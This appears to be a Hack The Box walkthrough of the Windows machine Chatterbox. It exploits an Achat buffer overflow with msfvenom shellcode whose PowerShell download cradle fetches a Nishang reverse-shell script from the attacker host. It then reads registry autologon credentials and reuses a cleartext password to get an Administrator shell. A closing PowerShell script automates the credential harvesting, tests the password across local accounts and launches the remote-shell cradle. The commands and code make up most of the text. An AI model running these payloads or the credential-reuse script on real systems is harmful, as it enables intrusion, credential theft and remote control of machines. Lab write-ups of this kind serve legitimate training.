HTB Series - Chatterbox

tags: htb chatterbox windows walkthrough

We start by scanning the target with nmap to find open ports

Drilling down to the ports marked with the tcpwrapped service

Using searchsploit
searchsploit achat

I don't want to figure out the directory for this, so I'll just paste it into the current directory with searchsploit -m exploitID

Exploit Logic

  • The Achat service is vulnerable to a buffer overflow, and a public exploit for it is available through searchsploit.
  • The exploit needs Unicode-safe shellcode: the bad-character list handed to msfvenom excludes 0x00 and every byte from 0x80 to 0xff, and the x86/unicode_mixed encoder is used with BufferRegister=EAX.
  • We generate that shellcode with msfvenom, using a windows/exec payload whose command is a PowerShell download cradle that fetches a script (here named Awaken.rocks) from our machine.
  • We serve Awaken.rocks with a python web server.
  • We start a netcat listener on the IP and port the script will connect back to.
  • We run the exploit: the cradle executes on the target, downloads Awaken.rocks, and the script opens a reverse shell to our listener.

Achat service vulnerability

Based on Achat exploit

Generate payload

Generate the encoded shellcode with the command below. The CMD is the PowerShell download cradle; the -b list and the unicode_mixed encoder are what the Achat exploit requires, and -f python produces output that can be pasted straight into the exploit script.

msfvenom -a x86 --platform Windows \
  -p windows/exec \
  CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/Awaken.rocks')\"" \
  -e x86/unicode_mixed \
  -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' \
  BufferRegister=EAX \
  -f python >> pay

Paste the generated shellcode into the exploit's python script in place of the shellcode it ships with, then edit the target address and port at the bottom of the script.

We use the Nishang Invoke-PowerShellTcp script to get the reverse shell. Append a line to the bottom of the script that calls Invoke-PowerShellTcp with -Reverse and our own -IPAddress and -Port, save the edited script as Awaken.rocks (the name the cradle requests), and put it in the directory the web server serves from.
Then start a netcat listener on that port before running the exploit.

Edited Nishang Invoke Powershell Script

Connection Established to Listener

Establish current privs

whoami /all

Escalating Privileges

We can use the PowerSploit suite, specifically the PowerUp.ps1 script from its Privesc module, to look for privilege escalation paths.

Copy PowerUp.ps1 into the folder being served by the web server, then from the shell acquired earlier download it and run Invoke-AllChecks:

PS> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/PowerUp.ps1')
PS> Invoke-AllChecks

From the output we can see that registry autologon is enabled, which means the autologon username and its password are stored in clear text in the registry, and PowerUp prints them.

Let's take a look at the users on the machine.

We note there is an Administrator user.

Following the same approach as before, let's see whether the Administrator account reuses the autologon password: build a PSCredential with it and use Start-Process -Credential to launch a new powershell as Administrator that downloads and runs the Nishang reverse shell script (this time served as okiro.ps1).

PS> $SecPass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
PS> $cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPass)
PS> Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.5/okiro.ps1')" -Credential $cred

Set up a listener on the port configured in okiro.ps1 before running the Start-Process line; when the new process downloads and runs the script, a reverse shell comes back as Administrator.
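The autologon finding and the password-reuse guess above can be turned into a systematic check. The script below is an added example, not code from the walkthrough or from PowerUp: it reads the same Winlogon values PowerUp's Get-RegistryAutoLogon reports, validates the recovered password against every enabled local account, and only then launches the download cradle as an account that accepted it. It assumes it runs on the target inside the low-privileged shell, that the web server address and script name are the ones used above (10.10.14.5, okiro.ps1), and that the account names are whatever the box has; the function names are my own.

```powershell
# Added example, not code from the walkthrough or from PowerUp.
# Reads the Winlogon autologon values, checks which enabled local accounts
# accept that password, and launches the Nishang cradle as one that does.
# Assumptions: runs on the target in the low-privileged shell; the web server
# address and script name (10.10.14.5, okiro.ps1) are the ones used above.

function Get-AutoLogonCredential {
    # Winlogon keeps autologon credentials in clear text in the registry.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $wl  = Get-ItemProperty -Path $key
    if ($wl.AutoAdminLogon -ne '1') { return $null }
    # PowerUp also checks the AltDefault* values; return the first pair that is set.
    foreach ($prefix in 'Default', 'AltDefault') {
        $user = $wl."${prefix}UserName"
        $pass = $wl."${prefix}Password"
        if ($user -and $pass) {
            return New-Object PSObject -Property @{
                Domain   = $wl."${prefix}DomainName"
                UserName = $user
                Password = $pass
            }
        }
    }
}

function Get-EnabledLocalUser {
    # ADSI WinNT provider: works on PowerShell 2.0, where Get-LocalUser does not exist.
    $computer = [ADSI]"WinNT://$env:COMPUTERNAME"
    foreach ($child in $computer.Children) {
        if ($child.SchemaClassName -ne 'user') { continue }
        # 0x2 is ADS_UF_ACCOUNTDISABLE; skip disabled accounts such as Guest.
        if ($child.UserFlags.Value -band 0x2) { continue }
        $child.Name.Value
    }
}

function Test-LocalCredential {
    param([string]$UserName, [string]$Password)
    # ValidateCredentials performs a real local logon check (so each call shows
    # up as a 4624/4625 in the Security log) without starting a process.
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement
    $machine = [System.DirectoryServices.AccountManagement.ContextType]::Machine
    $ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList $machine
    try     { $ctx.ValidateCredentials($UserName, $Password) }
    finally { $ctx.Dispose() }
}

function Find-PasswordReuse {
    param([string]$Password)
    # One attempt per account with a single password, so a normal lockout
    # threshold is not reached; it is still visible in the event log.
    foreach ($user in Get-EnabledLocalUser) {
        if (Test-LocalCredential -UserName $user -Password $Password) { $user }
    }
}

function Start-CradleAs {
    param([string]$UserName, [string]$Password,
          [string]$Cradle = "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/okiro.ps1')")
    # Same launch technique as the walkthrough: a new powershell.exe under the
    # other account that pulls and runs the Nishang reverse shell. The listener
    # for the port configured in okiro.ps1 must already be running.
    $sec  = ConvertTo-SecureString $Password -AsPlainText -Force
    $cred = New-Object System.Management.Automation.PSCredential($UserName, $sec)
    Start-Process -FilePath powershell -ArgumentList $Cradle -Credential $cred
}

$auto = Get-AutoLogonCredential
if (-not $auto) { Write-Warning 'No registry autologon configured'; return }
Write-Output "Autologon user: $($auto.UserName)  password: $($auto.Password)"
$hits = @(Find-PasswordReuse -Password $auto.Password)
Write-Output "Accounts accepting that password: $($hits -join ', ')"
if ($hits -contains 'Administrator') {
    Start-CradleAs -UserName 'Administrator' -Password $auto.Password
}
```

Run it from the existing reverse shell after starting the listener. The reuse check is what distinguishes this from the walkthrough's one-shot guess: Find-PasswordReuse tells you every local account the autologon password opens, so if Administrator does not reuse it you still learn which accounts do, and each validation is a single logon attempt rather than a spray. On the defensive side the same Get-AutoLogonCredential check is the thing to run on a fleet: an AutoAdminLogon of 1 with a populated DefaultPassword is a clear-text credential readable by any local user.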
